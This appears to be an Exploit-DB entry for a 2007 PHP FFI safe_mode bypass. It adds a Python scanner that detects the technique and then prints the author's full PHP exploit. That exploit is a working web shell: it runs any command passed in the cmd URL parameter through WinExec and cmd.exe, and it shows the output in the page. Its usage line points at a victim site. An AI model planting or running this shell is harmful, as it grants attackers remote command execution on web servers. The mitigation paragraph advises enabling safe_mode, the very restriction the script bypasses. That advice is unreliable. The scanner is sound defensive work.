Vendor: PHP
By: NetJackal
CVSS: 7.5 (HIGH)
Vulnerability class: Safe_mode Bypass
CWE: 284
Product Name: PHP
Affected Version From: PHP 5.0.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:php:php:5.0.5
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

PHP FFI Extension Safe_mode Bypass Exploit

This PHP script exploits a weakness in the PHP FFI (foreign function interface) extension to bypass the safe_mode restriction. safe_mode restricts what a script may do (for example, it confines the built-in command-execution functions), but FFI lets a script declare and call a native library function directly, so those restrictions never apply. The script takes the command to run from the cmd parameter in the URL, checks that the FFI extension is loaded, and then executes the command through the WinExec function from kernel32.dll. The command's output is redirected to a temporary file, which the script reads, displays on the web page, and then deletes.

Mitigation:

The FFI extension used here (the PECL package linked in the script header) is no longer supported in modern versions of PHP. Update to a supported PHP version and remove the FFI extension if it is present. Additionally, enabling safe_mode in the PHP configuration can help mitigate the risk of this vulnerability.
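For defenders who want to find scripts like this one on a web server, the following is an added example (not part of the Exploit-DB entry and not the author's code): a small static scanner that flags PHP sources combining the indicators visible in the script above: an FFI object construction, a native library declaration, a process-launch primitive (WinExec or "cmd.exe /c"), and request-controlled input. The sample files it scans are constructed inline for the demonstration; the indicator names and severity levels are this example's own choices.

```python
"""Scan PHP sources for native command execution through the legacy PECL FFI
extension, the pattern used by the safe_mode bypass on this page.
Added example; the sample files below are constructed, not real deployments."""
import re
from dataclasses import dataclass
from typing import Optional

# Indicator patterns derived from the script on this page.
INDICATORS = {
    "ffi_object":     re.compile(r"new\s+ffi\s*\(", re.IGNORECASE),
    "native_library": re.compile(r"\[\s*lib\s*=\s*['\"][^'\"]+['\"]\s*\]", re.IGNORECASE),
    "winexec":        re.compile(r"\bWinExec\b"),
    "shell_runner":   re.compile(r"cmd\.exe\s*/c", re.IGNORECASE),
    "request_input":  re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["),
}


@dataclass
class Finding:
    path: str
    severity: str          # "high", "medium" or "low" (example's own scale)
    indicators: list[str]


def classify(indicators: list[str]) -> Optional[str]:
    """Map a list of indicator names to a severity, or None if nothing matched."""
    hits = set(indicators)
    native_call = "ffi_object" in hits and "native_library" in hits
    exec_primitive = "winexec" in hits or "shell_runner" in hits
    if native_call and exec_primitive and "request_input" in hits:
        return "high"      # native process launch driven by request data
    if native_call and exec_primitive:
        return "medium"    # hard-coded command launched through a native call
    if native_call or exec_primitive:
        return "low"       # FFI use or a shell string worth a manual look
    return None


def scan_source(path: str, source: str) -> Optional[Finding]:
    """Return a Finding for one PHP file, or None when nothing matches."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    severity = classify(hits)
    if severity is None:
        return None
    return Finding(path=path, severity=severity, indicators=hits)


def scan_tree(files: dict[str, str]) -> list[Finding]:
    """Scan a mapping of path -> source text; most severe findings first."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [f for f in (scan_source(p, s) for p, s in files.items()) if f]
    return sorted(findings, key=lambda f: (order[f.severity], f.path))


# Constructed sample files: one shaped like the script on this page, one
# legitimate FFI use with no request input, and one page without FFI at all.
SAMPLE_FILES = {
    "htdocs/NJ.php": (
        "<?php\n"
        "$command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd'];\n"
        "$api = new ffi(\"[lib='kernel32.dll'] int WinExec(char *APP,int SW);\");\n"
        "$api->WinExec(\"cmd.exe /c $command\", 0);\n"
    ),
    "htdocs/math.php": (
        "<?php\n"
        "$m = new ffi(\"[lib='libm.so.6'] double cos(double x);\");\n"
        "echo $m->cos(0.5);\n"
    ),
    "htdocs/contact.php": (
        "<?php\n"
        "$name = htmlspecialchars($_GET['name'] ?? '');\n"
        "echo \"<p>Hello $name</p>\";\n"
    ),
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f.severity:6} {f.path}  ({', '.join(f.indicators)})")
```

Run against a real document root by reading each .php file into the mapping passed to scan_tree; the "low" tier exists so that legitimate FFI use (the libm sample) is reported for review rather than treated as an incident.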
Source

Exploit-DB raw data:

<?php

##########################################################
###----------------------------------------------------###
###-----PHP FFI Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Tested on 5.0.5------------------------------------###
###----------------------------------------------------###
###-Usage:-http://victim.net/NJ.php?cmd=[COMMAND]------###
###----------------------------------------------------###
###-PHP:-http://php.net--------------------------------###
###-FFI:-http://pecl.php.net/package/ffi---------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

// Bail out if the PECL FFI extension is not available.
if (!extension_loaded('ffi')) {
    die('ERROR: FFI extension is not loaded!');
}

// The command comes from the cmd= query parameter; defaults to "dir".
$command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd'];

// Pick a writeable directory for the temporary output file.
if (is_writeable(dirname(__FILE__))) {
    $tmp = dirname(__FILE__);
} elseif (is_writeable(ini_get('session.save_path'))) {
    $tmp = ini_get('session.save_path');
} elseif (is_writeable(ini_get('upload_tmp_dir'))) {
    $tmp = ini_get('upload_tmp_dir');
} else {
    die('ERROR: Move exploit to writeable folder.');
}
$output = "$tmp\\" . uniqid('NJ');

// Declare WinExec from kernel32.dll through the PECL FFI syntax and launch
// the command, redirecting its output to the temporary file.
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$output\"", 0);

// Wait for the output file to appear, then read, display and delete it.
while (!file_exists($output)) {
    sleep(1);
}
$con = '';
$fp = fopen($output, 'r');
while (!feof($fp)) {
    $con .= fgets($fp, 1024);
}
fclose($fp);
$con = htmlspecialchars($con);
echo "<pre>$con</pre>";
unlink($output);
?>

# milw0rm.com [2007-08-23]